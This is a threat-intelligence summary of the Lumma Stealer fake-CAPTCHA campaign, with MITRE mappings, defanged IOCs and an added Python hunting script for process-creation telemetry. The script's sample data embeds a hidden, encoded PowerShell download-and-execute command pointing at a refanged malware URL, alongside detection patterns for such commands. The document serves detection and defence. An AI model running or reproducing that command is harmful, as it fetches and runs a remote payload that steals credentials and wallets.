The article discusses the rise of Lumma Stealer, a sophisticated Malware-as-a-Service (MaaS) offering that has emerged as a major threat to both individuals and organizations. Using a range of distribution methods, most notably fake CAPTCHA pages, Lumma Stealer deceives users into executing the malicious commands themselves. Its multi-stage infection chain, which includes DLL sideloading and payload injection, helps it evade security detection. Affected: individuals, organizations, cybersecurity sector
Key points:
- Lumma Stealer was introduced in 2022 and is marketed primarily on underground platforms.
- It is distributed through techniques such as phishing emails, trojanized applications, and fake CAPTCHA pages.
- The fake CAPTCHA distribution method tricks users into executing malicious PowerShell commands.
- The malware employs DLL sideloading and overlay injection to evade detection.
- Successful infections leverage social engineering tactics, specifically through cloned websites and fraudulent Telegram channels.
- Lumma Stealer targets sensitive data, including cryptocurrency wallet information, two-factor authentication data, and system credentials.
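The fake-CAPTCHA lure leaves a distinctive trace in endpoint telemetry: a PowerShell process launched by the victim's own shell session with download-and-execute style arguments. The following is an added hunting example, not code from the Securelist write-up or from the Lumma operators. It runs over constructed process-creation records whose field names mirror Sysmon Event ID 1 (`Image`, `ParentImage`, `CommandLine`); the sample command lines, the assumption that the pasted command is launched from the Run dialog (so the parent is `explorer.exe`), and the argument patterns are the author's assumptions. The only data taken from the page is the defanged IOC list, which the code refangs to match against command lines.

```python
"""Hunt for the fake-CAPTCHA "paste this command" execution pattern in
process-creation telemetry. Added example; records below are constructed."""
import base64
import re
from typing import List, Optional

# Defanged indicators copied from the report's IOC section.
REPORT_IOCS = [
    "hxxps://win15.b-cdn[.]net/win15.txt",
    "hxxps://win15.b-cdn[.]net/win15.zip",
    "hxxps://connect[.]klipfuzj[.]shop/firefire[.]png",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator (hxxp, [.], [:]) back into a matchable string."""
    return ioc.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


IOC_HOSTS = {
    re.sub(r"^https?://", "", refang(u)).split("/")[0].lower() for u in REPORT_IOCS
}

# Command-line features typical of a copy-pasted download-and-run one-liner
# (assumed patterns, not taken from the report).
SUSPICIOUS_ARGS = [
    r"-(?:e|ec|enc|encodedcommand)\b",            # -EncodedCommand and its short forms
    r"-w(?:indowstyle)?\s+hidden",                # hide the console window
    r"\biex\b|invoke-expression",                 # execute downloaded text
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
]
ARG_RE = re.compile("|".join(SUSPICIOUS_ARGS), re.IGNORECASE)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; decode it so the
    real payload can be inspected and matched."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> List[str]:
    """Return the reasons an event looks like fake-CAPTCHA execution (empty = benign)."""
    reasons: List[str] = []
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return reasons
    decoded = decode_encoded_command(cmd)
    text = cmd + (" " + decoded if decoded else "")
    if parent.endswith("\\explorer.exe"):
        reasons.append("PowerShell launched directly from explorer.exe (Run dialog / user action)")
    if ARG_RE.search(text):
        reasons.append("download-and-execute style arguments")
    if decoded:
        reasons.append("encoded command decodes to: " + decoded[:60])
    for host in IOC_HOSTS:
        if host in text.lower():
            reasons.append("references reported IOC host " + host)
    return reasons


def hunt(events: List[dict]) -> List[tuple]:
    """Run analyze() over a batch and keep only the flagged records."""
    return [(i, analyze(e)) for i, e in enumerate(events) if analyze(e)]


def _enc(ps: str) -> str:
    """Encode a command the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample telemetry: one lure execution, one scheduled admin
# script, one unrelated cmd.exe launch.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -ep bypass -enc "
                    + _enc("iex (iwr 'https://win15.b-cdn.net/win15.txt')")},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},
]

if __name__ == "__main__":
    for idx, reasons in hunt(SAMPLE_EVENTS):
        print(f"event {idx}:", "; ".join(reasons))
```

The explorer.exe parent is the weakest of the four signals on its own (users legitimately start PowerShell from the Start menu), so treat it as a boost rather than a trigger; the decoded `-EncodedCommand` text and the IOC host match are what make the first record actionable.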
MITRE Techniques:
- Execution (T1204 – User Execution; T1059.001 – PowerShell): users are tricked into running malicious PowerShell commands themselves by deceptive CAPTCHA pop-ups.
- Persistence (T1547 – Boot or Logon Autostart Execution): Lumma Stealer creates a registry entry to persist on infected machines.
- Defense Evasion (T1027 – Obfuscated Files or Information): the malware obfuscates its PowerShell scripts and DLLs to hinder analysis and detection.
- Collection (T1005 – Data from Local System): the malware gathers credentials, cookies, and cryptocurrency wallet information from the infected host.
- Command and Control (T1071 – Application Layer Protocol): the malware communicates with its C2 servers over HTTP, sending encrypted POST requests to exfiltrate the stolen data.
Indicators of Compromise:
- [URL] hxxps://win15.b-cdn[.]net/win15.txt
- [URL] hxxps://win15.b-cdn[.]net/win15.zip
- [URL] hxxps://connect[.]klipfuzj[.]shop/firefire[.]png
Full Story: https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/